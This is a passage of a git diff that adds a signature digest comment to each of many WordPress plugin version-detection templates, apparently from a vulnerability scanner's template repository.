b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..63f26b252c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ef77e517470362fce6746c6ae729621b333a05cdf067deb04d40e612c50453602205055c3989acc269df34d303e5f5079f3bdbfb138e29c5e0e2956bc98c4bab4e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..f1e02a2956 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ddcaef2d87e57c47c1216fd27cec98d9789b28bec9db37801eac1bb1506c543c022017d5fa7c3f8840213d52e10cdb3f276f1cb3e79b9b30e66693d4560b2e900572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..bde2295840 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d6605b07075977d3bd1b9a4bad0af86ed3e6575dd71580f8f3306ed297e083ba022068aba7a8dded1caf600d44d88dba703cc6fe9338b12ea25ef06d369208fdcaa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..8617cf9049 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1272624b74bf2f8bc7ab846343bb82d449c294222b2b0c7613a73a81b5afcc102206dc23ffaa70ef0cbcb7856a074c68285a38d42b23f288ddec5f270f6011968b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..dfe71e7462 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100892ffcec8a7591546a924b1d720b15cc9c973db07954b8fbbfc8237d175ed62c022100d1bb04d9baf28eba90b33cc7bee4d04b36ad9bb2b2a27afc6c8c198513640e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..7db918b436 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210095191f9fc71ab44568668159bcb4b1e29a21912bac45df9bb472a93d37a4f6ca022100ef2cf9d7a051ca955ed9f75da3c02d22c5365789b1fe7a544c31a68903845480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..08ca6203b4 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204641a9df585a95863682e43731d05b2007a5b369b418fcb10086b8c116a7a217022100e885efb86bcc81191420d9ffcbf5ffee92d186b3e4756c454eab29df1e908e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..55d496cfe1 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0fc0bc8c59a7a523d40d372ba9af53b6ededbeda4c019053218f5aad3eb523102206e1df7bf277afa03f81043a06caa23807e498eb2ae3a5d1b801819fc61400f92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..8233c89ab2 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0adc9141d3873b9b454c20a2db4ff091b7e71ea64e32fda03f6646b512a5fdd022100caf472dcfe300cf94b05e520d944cedfb4bee44e04d8b5ca405f5ae29077c69b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..6447d3e8f3 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac7dc92c83a7044ca278070350d0d2be1911a2e975af69e8b2e417536f1fd67702200804aca9fad9783503f0ac652954581666069a41d371646ed55a40ff97a35227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..1d6efb9b95 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100abb1eebd29a989e78dfeca66560643d56ec84bd6cef5e708d31fd05bb370d4bd02202302b31adb9bff57793e239a20ae49beb422c88dffd874c3483ec2c271eeb3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..7c34558927 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9ecc0b88ef6e3778d519f5a72bdbc9cfb058bdc89eb8859bfe79311495585430220129aeee3093cbf4485bd3492aa16dd5cba2943cb16cacafb163f4fa2da234f02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..558e8cda87 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfe390a5958d1eb5b0295719d684cd26dfc86a81c085b8dac486a4d54268d20102205be5f76a791960e7deeae6082c45ba3bc60e5945a1024afb70625c68e20a70a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..42948cddfa 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022038589d433bbde8dba0066c66ede206e58aef1c8605e62069f80d52bd491cf8e1022029e2a3bc6627e78f600a9383ba2e6074bd208f858e0ad1cd5bb18c8ac5080e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..9baca7acf1 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201514634e040466b369306f79c6cc5cda0d89594d6e52d8abddb7a8d259a979ab02203a08365feff0849dd46d4b20fcb5f1c66b3fa3d7e86205ef29fe133cdcd0704c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..97f5161cbf 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220594fa7bc5441f2f9461b8e174cd397eee18596727635e1d0831182e988293377022100b934c462dc4222866ff95d3a1d4f346b5bccbc3ec8454169e4fdae5b7735c4d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..88acb738a2 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220403df272bc3788fd0c82a59fabce74985e0459111b06423fa26b7c316bd2af85022013095d0e912ba3f21be104796fa98578827f05078dac47d726c050644ee6c79e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..4a1442cdbc 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200bd24a16c2ba71071b5a6cc9a295f43297c22897d5b902a9ba062c7cd1ddc7f302201ef687cc2135df88bb04ab2424be598f76e8de5abf972c315ff3ece1602e72f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..d2baab7732 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d6de4cfd0f6047924d492d99571b6fac42528ab61ca36b541b016da8bf29382022100f3e7122babc1f1db5c77265814f0213df34bdbea4ce51e5ac60541daa8e0593e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..09b9ef33a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003574f2cfcb7ee0d3a68cd667d886767bfd7207003642cdc025cdaa138c5d931022028a331c4e502c93f528cb21ae41645672b977c1f35769f25a57bf03b1b052e18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..5385dda335 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202134d465cf635714d41472180159b96628bdd08b3018272e1b5b3ee49dddd820022100d694931c52a59abd7b2d69850027380054f6e301b29b09282fbe148b262d5406:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..1af78f1d47 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f398fa5f8067ca821ddf59aa5c926c616d5bb22b7a7bb227ce64e69ed3907a802206ca09e43d0b49a47ec377e7ec2e53c5021922f90c8ff0c6049057191ee5805af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..e9ef9bf627 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205b69dfe99d613742d7f594816646f71ca0def28eb177533cd673fac5908004e602206f5f06a6bc79f9e8c5c54ca99aca465fa2255d21a5466f9608ae35f239ab39fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..8e5016c723 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009562049e993f33758d66557cbf0f4dd163bba1f07102db165d7ba81293fe7fa6022100d883cec5ae3af7248396e77a35bceb4688718bcebcafee0206863bdabff64e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..11206a8633 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d088fb8c32f93e2e85577e0a4da96d035df2a8e6555ee57119d53a58feec00d1022100d88387fb238daeb74543e40d7c4212a865b64fc0c59d330791cce50bee3feb3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..629fd1dda1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c9ecf82466c5406a0e71e694a24ae86927ffc19bf58eeff8c28996078433b9102207caa18ce75bb66563bc06f60197bd2cc35aae0cb9a11e0f359cc4b702b1f0f7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..5144cd7a60 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c5bbfce48044ab55d91965a1271c4509105177d2f80e4c83f6ffbfafb3915e6022100d3675c83b017d9177c820de4835700ba7b696feac38e334511d21041474b7279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..1b29cdb5b7 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd42cbd9b9f15398af17b40e70cef77e1eac6e128547a92f63c06524c519193b022100a2d3960f87c4a6492c148dbc8666a62e86f66f14d156e46ce9f95ea1ebf9da25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..7b88418422 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e17fcb9289b16d83bec469835b1aa8db0146286958222a23fe474480275ad55022055180a1c2613511c41163202cd2148dc443852a709bb7b2df95c73f78d9b497d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..2e3d6c1fb6 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8e5e5b2f252413f970e8b5dc255edb96dd77b183949359c9aa398fc00c7b1b0022100af720eed99b1d1bdc3e050e2a64b33095537cadfe71c0bd93f2070c6094a183a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..392c3e18e7 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100898851c563642ccc00d0d95764d519ff251ad6f7624af72fd0a3592e69e2cdab022100cacd35197163580e929d9c1708aa72a34ee90bd8ceec5cd449e6cad11c7682fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..ce3a77de47 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201376e759fadae424159524833cdb80bd937ae216611c8e0845aa877d82a63a65022100efb4e6bb7641a2e3db7ecb23e674609d32f8c4896cc69ed030da7fb40609231c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..29b9118d45 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089fd03dea74d4bea4797d1edae227edc67c2979c028d5ad81caf977dc534f57402207f3a0e66cbfa2e998c09a189987edd1ca08dd4b8bbb19fde78ac8b1a767ff44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..11a57238bd 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220539c0c1c0dffac3555b264fdcb166bab30744e5417f3631c14e4f47afe9e143d022100bb0f6cb9b364f0b2a62ae00e38dc46f31e3145df78f935876a769a5fc829ade0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..a6f0a6bdd0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220033ac044822efd550903d411bd0b20331da602e0b613caac804426f7ddc115af0220191e89ea4ff07add0193380cb846832bc873d1e8a535db08d35b932460a4cc7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..416f527f39 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201498cafd64b3b6b72aae1faabc77347834d248622756287196d858010d05d5e2022100c8a38eda1656653eb3d572de04b23877ec7f32d099994e605a3857976622d810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..d1721c828b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c79c103f0ca19c3432924f804c5903717b11c32435062f9a0903230854b63432022100daec20777ca6c1181407f01eeffc97d528270cb2a3ee3f80e10ebd9c1c46acba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..c35a5f1e3b 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e31546e7c1be8c8bd8818bd404edeb797d517fbec4c16de159e86d02e9a3aaae02202f10a979f3f304e590c15c7bf46d8f87fa5631e790789990614b362b43f2c9dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..f4e794bd01 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce9ca71d82d607a7e596e05f9a7f99584fab9be6f6fd263cc3d545d9117dc9ba02205466c83966d732d54e1c6a689be6f88175a0b8f128a78b31d55eb9fc6a0cd1e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..dcdb949347 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ea0f99dca197a4db3a146206a876a7a055635a6c037c8ad287a2e544ef526050221009223692b313acafebdf4df3762c225a548f05451aecee42e230f9bd84f89ede5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..82fbefca13 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044969c5fdd70637563b63ce2438939c5bf4b6dd3de09aaa96c85ea85b15965b1022018a52efb5d2fb1338ce030b39891c951cd574628fbea9ef95ef9d649a2a813d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..41583637c3 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220502539580a3af5080e35cd439fe02d66f9546b65e0d65eea9c6f6cf16b3aba140220161692ed1b313def6c3192322f7c9c8931a5cae4ae2334c799d66a38b2f1659a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..942bc1e869 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220652a727ad8c787629b07f55e304b08b0157a33f734a203f14a9310ecbac3917602205db6cdc7749dcf230abe4bc20364fca9241c4b98a8014d6ea2cf29872b41b4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..84fbc045a5 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008a217e6ed0c3351d099a073ade55bf7b741348d996fd1275b4af6f0496d6a60e022052face3a667682f6fdb2c683fb197df0768edcbc8ad1599bb4f9b48ae910c0e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..2ceb393f20 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6026934cd2089c1b8b59c9e3aeaf309fa53fd6e5beefae788912a7addd77d91022100d01224b615e7a744b1ab83e0a3859ace855e42402e8c202c1f8851559c59694f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..94f2053f65 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9586c758b7e8f36cabd33b98d6fa3cab7a5bb97e4d0989031d8c9e84ed93d8202200da538024f7c58cd72c848ac396556b98242ff7fd67bb0bdda3273cce72c6bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..c39c48ab42 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203de328d913c411e6d9cd0d454456548c2a0c8eab56202555e67f4f6719d55c8b02200bde0c65106d799f0411859f8dd1a4646e3bd6ab0dd8f2cb0605b3097038dcfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..8c5ca2c285 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d80796fc6f892fcc3749c3411ac9cb4d6a2fa6f0c13e476147098a3ad38042f022100a3123665849bb5800ec8c01ff28105efed8b4a4b5e3729c38d2cf5537f0cacaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 